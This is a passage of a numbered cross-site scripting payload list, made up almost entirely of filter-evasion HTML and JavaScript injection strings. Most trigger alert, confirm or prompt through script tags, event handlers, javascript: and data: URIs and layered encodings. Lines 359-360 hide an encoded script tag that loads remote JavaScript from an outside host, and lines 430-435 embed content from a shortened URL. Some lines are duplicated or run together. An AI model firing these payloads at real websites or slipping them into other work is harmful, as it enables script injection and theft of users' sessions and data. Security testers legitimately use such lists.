  359. "><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  360. '><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  361. <svg+onload=confirm(1);>
  362. "><svg+onload=confirm(1);>
  363. '><svg+onload=confirm(1);>
  364. <svg onload=prompt(1);>
  365. "><svg onload=prompt(1);>
  366. '><svg onload=prompt(1);>
  367. <input+onfocus=alert(1)>
  368. "><input+onfocus=alert(1)>
  369. '><input+onfocus=alert(1)>
  370. ∀㸀㰀script㸀alert(1)㰀/script㸀
  371. &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
  372. <a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">X</a>
  373. "><a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">X</a>
  374. '><a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">X</a>
  375. <scr\x00ipt>confirm(1);</scr\x00ipt>
  376. "><scr\x00ipt>confirm(1);</scr\x00ipt>
  377. '><scr\x00ipt>confirm(1);</scr\x00ipt>
  378. <svg/onload=prompt(1);>
  379. "><svg/onload=prompt(1);>
  380. '><svg/onload=prompt(1);>
  381. <svg><script>alert&#40/1/&#41</script>
  382. "><svg><script>alert&#40/1/&#41</script>
  383. '><svg><script>alert&#40/1/&#41</script>
  384. <isindex action="javas&Tab;cript:alert(1)" type=image>
  385. "><isindex action="javas&Tab;cript:alert(1)" type=image>
  386. '><isindex action="javas&Tab;cript:alert(1)" type=image>
  387. <form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK
  388. "><form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK
  389. '><form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK
  390. <form action='java&Tab;scri&Tab;pt:alert(1)'><button>CLICK
  391. "><form action='java&Tab;scri&Tab;pt:alert(1)'><button>CLICK
  392. '><form action='java&Tab;scri&Tab;pt:alert(1)'><button>CLICK
  393. <form action=javascript&NewLine;:alert(1)><input type=submit>
  394. "><form action=javascript&NewLine;:alert(1)><input type=submit>
  395. '><form action=javascript&NewLine;:alert(1)><input type=submit>
  396. <form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>
  397. "><form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>
  398. '><form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>
  399. <form action="&Tab;javas&Tab;cript&Tab;:alert('X :)')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>
  400. "><form action="&Tab;javas&Tab;cript&Tab;:alert('X :)')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>
  401. '><form action="&Tab;javas&Tab;cript&Tab;:alert('X :)')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>
  402. <form id="myform" value="" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
  403. "><form id="myform" value="" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
  404. '><form id="myform" value="" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
  405. '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)
  406. "></plaintext\></|\><plaintext/onmouseover=prompt(1)
  407. '></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>
  408. "><script>prompt(1)</script>
  409. '><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/X/) type=submit>'-->"></script><script>alert(1)</script>
  410. "><script>alert(1)</script>
  411. '><script>alert(1)</script>"><img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>'"><img src="http://127.0.0.1:3555/xss_serve_payloads/X.jpg">
  412. <script>var url = "<!--<script>";//</script>alert(1)</script>
  413. "><script>var url = "<!--<script>";//</script>alert(1)</script>
  414. '><script>var url = "<!--<script>";//</script>alert(1)</script>
  415. <form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
  416. "><form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
  417. '><form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
  418. <iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">
  419. "><iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">
  420. '><iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">
  421. <svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))
  422. "><svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))
  423. '><svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))
  424. <img/src='http://127.0.0.1:3555/xss_serve_payloads/X.jpg' onmouseover=&Tab;prompt(1)
  425. "><img/src='http://127.0.0.1:3555/xss_serve_payloads/X.jpg' onmouseover=&Tab;prompt(1)
  426. '><img/src='http://127.0.0.1:3555/xss_serve_payloads/X.jpg' onmouseover=&Tab;prompt(1)
  427. <svg><script>alert&#40 1&#41
  428. "><svg><script>alert&#40 1&#41
  429. '><svg><script>alert&#40 1&#41
  430. <embed/src=//goo.gl/nlX0P>
  431. "><embed/src=//goo.gl/nlX0P>
  432. '><embed/src=//goo.gl/nlX0P>
  433. <object/data=//goo.gl/nlX0P>
  434. "><object/data=//goo.gl/nlX0P>
  435. '><object/data=//goo.gl/nlX0P>
  436. javascript:confirm(1)
  437. javascript:confirm(1);
  438. javascript:alert(1)
  439. javascript:alert(1);
  440. avascript&#00058;alert(1)
  441. javaSCRIPT&colon;alert(1)
  442. JaVaScRipT:alert(1)
  443. javas&Tab;cript:\u0061lert(1);
  444. javascript:\u0061lert&#x28;1&#x29
  445. javascript&#x3A;alert&lpar;1&rpar;
  446. javascript&colon;alert(1)
  447. javascript&#x3A;alert(1)
  448. j&#x61;v&#x41;sc&#x52;ipt&#x3A;alert(1)
  449. j&#x61;v&#x41;sc&#x52;ipt&#x3A;al&#x65;rt&lpar;1&rpar;
  450. vbscript:alert(1);
  451. vbscript&#00058;alert(1);
  452. vbscr&Tab;ipt:alert(1)"
  453. <iframesrc="javascript:alert(2)">
  454. "><iframesrc="javascript:alert(2)">
  455. '><iframesrc="javascript:alert(2)">
  456. <iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  457. "><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  458. '><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  459. <isindexformaction="javascript:alert(1)" type=image>
  460. "><isindexformaction="javascript:alert(1)" type=image>
  461. '><isindexformaction="javascript:alert(1)" type=image>
  462. <input type="image" formaction=JaVaScript:alert(0)>
  463. "><input type="image" formaction=JaVaScript:alert(0)>
  464. '><input type="image" formaction=JaVaScript:alert(0)>
  465. <form><button formaction=javascript&colon;alert(1)>CLICKME
  466. "><form><button formaction=javascript&colon;alert(1)>CLICKME
  467. '><form><button formaction=javascript&colon;alert(1)>CLICKME
  468. <form action="Javascript:alert(1)"><input type=submit>
  469. "><form action="Javascript:alert(1)"><input type=submit>
  470. '><form action="Javascript:alert(1)"><input type=submit>
  471. <isindex action="javascript:alert(1)" type=image>
  472. "><isindex action="javascript:alert(1)" type=image>
  473. '><isindex action="javascript:alert(1)" type=image>
  474. <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
  475. "><isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
  476. '><isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
  477. <isindex action=data:text/html, type=image>
  478. "><isindex action=data:text/html, type=image>
  479. '><isindex action=data:text/html, type=image>
  480. “/><marquee onfinish=confirm(1)>a</marquee>
  481. <object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
  482. "><object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
  483. '><object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
  484. <img src= "a" onerror= 'eval(atob("cHJvbXB0KDEpOw=="))'
  485. "><img src= "a" onerror= 'eval(atob("cHJvbXB0KDEpOw=="))'
  486. '><img src= "a" onerror= 'eval(atob("cHJvbXB0KDEpOw=="))'
  487. <script>alert('X')</script>=a
  488. "><script>alert('X')</script>=a
  489. '><script>alert('X')</script>=a
  490. <script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
  491. "><script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
  492. '><script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
  493. ';!--"<XSS><script>alert(1);</script>
  494. "><script>alert(1);</script>
  495. '><script>alert(1);</script>={()}
  496. <script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
  497. "><script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
  498. '><script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
  499. asfunction:getURL,javascript:alert(1)//
  500. \%22))}catch(e){}if(!self.a)self.a=!alert(1)//
  501. "]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
  502. 0%5C"))%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(1)%7D%7D//
  503. <button/onclick=alert(1) >X</button>
  504. "><button/onclick=alert(1) >X</button>
  505. '><button/onclick=alert(1) >X</button>
  506. <a onmouseover=(alert(1))>X</a>
  507. "><a onmouseover=(alert(1))>X</a>
  508. '><a onmouseover=(alert(1))>X</a>
  509. <p/onmouseover=javascript:alert(1); >X</p>
  510. "><p/onmouseover=javascript:alert(1); >X</p>
  511. '><p/onmouseover=javascript:alert(1); >X</p>
  512. <article xmlns="><img src=x onerror=alert(1)"></article>
  513. "><article xmlns="><img src=x onerror=alert(1)"></article>
  514. '><article xmlns="><img src=x onerror=alert(1)"></article>
  515. <article xmlns="x:img src=x onerror=alert(1) ">
  516. "><article xmlns="x:img src=x onerror=alert(1) ">
  517. '><article xmlns="x:img src=x onerror=alert(1) ">
  518. <p style="font-family:'\22\3bx:expression(alert(1))/*'">
  519. "><p style="font-family:'\22\3bx:expression(alert(1))/*'">
  520. '><p style="font-family:'\22\3bx:expression(alert(1))/*'">
  521. <svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  522. "><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  523. '><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  524. "><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  525. "><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  526. '><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  527. '><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  528. "><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  529. '><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>
  530. <listing>&ltimg src=x onerror=alert(1)&gt</listing>
  531. "><listing>&ltimg src=x onerror=alert(1)&gt</listing>
  532. '><listing>&ltimg src=x onerror=alert(1)&gt</listing>
  533. "onmouseover=alert(1);a="
  534. '+alert(1)&&null=='
  535. +alert(1)&&null=='
  536. \\\'><script>1<\\/script>
  537. \\\'><body onload=\\\'1\\\'>
  538. \"><script>1<\\/script>
  539. ><script>1<\\/script>
  540. \"><body onload=\"1\">
  541. <img src=\"x:X\" onerror=\"alert(1)\">
  542. "><img src=\"x:X\" onerror=\"alert(1)\">
  543. '><img src=\"x:X\" onerror=\"alert(1)\">
  544. <img src=a onerror=alert(1)
  545. "><img src=a onerror=alert(1)
  546. '><img src=a onerror=alert(1)
  547. <script>alert(\'1\')</script>
  548. "><script>alert(\'1\')</script>
  549. '><script>alert(\'1\')</script>
  550. <script>alert(\'\\\\1\\\\\')</script>
  551. "><script>alert(\'\\\\1\\\\\')</script>
  552. '><script>alert(\'\\\\1\\\\\')</script>
  553. <script>alert(\'\\/\\1\\/\\\')</script>
  554. "><script>alert(\'\\/\\1\\/\\\')</script>
  555. '><script>alert(\'\\/\\1\\/\\\')</script>
  556. \'\'\">
  557. <scri%00pt>alert(1);</scri%00pt>
  558. "><scri%00pt>alert(1);</scri%00pt>
  559. '><scri%00pt>alert(1);</scri%00pt>
  560. <scri\x00pt>alert(1);</scri%00pt>
  561. "><scri\x00pt>alert(1);</scri%00pt>
  562. '><scri\x00pt>alert(1);</scri%00pt>
  563. <s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>
  564. "><s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>
  565. '><s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>
  566. <script>alert(1);</script>
  567. "><script>alert(1);</script>
  568. '><script>alert(1);</script>
  569. <%0ascript>alert(1);</script>
  570. "><%0ascript>alert(1);</script>
  571. '><%0ascript>alert(1);</script>
  572. <%0bscript>alert(1);</script>
  573. "><%0bscript>alert(1);</script>
  574. '><%0bscript>alert(1);</script>
  575. <!--[if]><script>alert(1)</script -->
  576. "><!--[if]><script>alert(1)</script -->
  577. '><!--[if]><script>alert(1)</script -->
  578. <SCRIPT> alert(\"1\");</SCRIPT>
  579. "><SCRIPT> alert(\"1\");</SCRIPT>
  580. '><SCRIPT> alert(\"1\");</SCRIPT>
  581. <SCRIPT> alert(\"1\")</SCRIPT>
  582. "><SCRIPT> alert(\"1\")</SCRIPT>
  583. '><SCRIPT> alert(\"1\")</SCRIPT>
  584. <script>alert([!![]] [])</script>
  585. "><script>alert([!![]] [])</script>
  586. '><script>alert([!![]] [])</script>
  587. <var onmouseover="prompt(1)">X</var>
  588. "><var onmouseover="prompt(1)">X</var>
  589. '><var onmouseover="prompt(1)">X</var>
  590. %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80​
  591. <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
  592. "><input type="text" value=``<div/onmouseover='alert(1)'>X</div>
  593. '><input type="text" value=``<div/onmouseover='alert(1)'>X</div>
  594. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ​
  595. "><iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ​
  596. '><iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ​
  597. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  598. "><iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  599. '><iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  600. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  601. "><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  602. '><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>​
  603. "><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  604. "><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  605. '><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>​
  606. '><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  607. "><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  608. '><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>​
  609. <embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
  610. "><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
  611. '><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>​
  612. "><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>​
  613. '><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>​
  614. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  615. "><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  616. '><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  617. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
  618. "><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
  619. '><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script ​​​​​​​​​​​​
  620. "><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
  621. "><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
  622. '><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script ​​​​​​​​​​​​
  623. '><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
  624. "><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
  625. '><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script ​​​​​​​​​​​​
  626. <script itworksinallbrowsers>/*<script* */alert(1)</script
  627. "><script itworksinallbrowsers>/*<script* */alert(1)</script
  628. '><script itworksinallbrowsers>/*<script* */alert(1)</script ​
  629. "><script itworksinallbrowsers>/*<script* */alert(1)</script ​
  630. '><script itworksinallbrowsers>/*<script* */alert(1)</script ​
  631. <img src ?itworksonchrome?\/onerror = alert(1)
  632. "><img src ?itworksonchrome?\/onerror = alert(1)
  633. '><img src ?itworksonchrome?\/onerror = alert(1)​​​
  634. "><img src ?itworksonchrome?\/onerror = alert(1)​​​
  635. '><img src ?itworksonchrome?\/onerror = alert(1)​​​
  636. <meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
  637. "><meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
  638. '><meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
  639. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  640. "><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  641. '><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  642. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  643. "><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  644. '><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ​
  645. "><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  646. "><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  647. '><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ​
  648. '><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  649. "><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  650. '><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ​
  651. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>​
